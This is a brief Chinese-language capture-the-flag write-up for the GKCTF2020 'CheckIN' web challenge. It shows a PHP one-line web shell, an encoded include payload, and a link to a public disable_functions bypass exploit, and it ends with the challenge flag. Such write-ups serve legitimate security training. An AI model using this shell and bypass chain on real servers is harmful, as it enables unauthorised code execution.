[GKCTF2020] web题-CheckIN

复现环境:buuoj.cn

[GKCTF2020] web题-CheckIN
代码提示有eval函数可以执行base64加密代码
[GKCTF2020] web题-CheckIN

[GKCTF2020] web题-CheckIN
成功回显了phpinfo信息
编辑一句话上传
eval($_POST[1]);
[GKCTF2020] web题-CheckIN
根目录上有flag和readflag,但都没法访问,应该是权限不够
bypass disable_functions 该漏洞可以执行命令执行
exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
[GKCTF2020] web题-CheckIN
上传到有权限的目录/tmp
[GKCTF2020] web题-CheckIN
?Ginkgo=aW5jbHVkZSgiL3RtcC8xLnBocCIpOw==
[GKCTF2020] web题-CheckIN
flag{0a42b3fe-b4e0-4a5f-9e0f-5dfdae8ce2e2}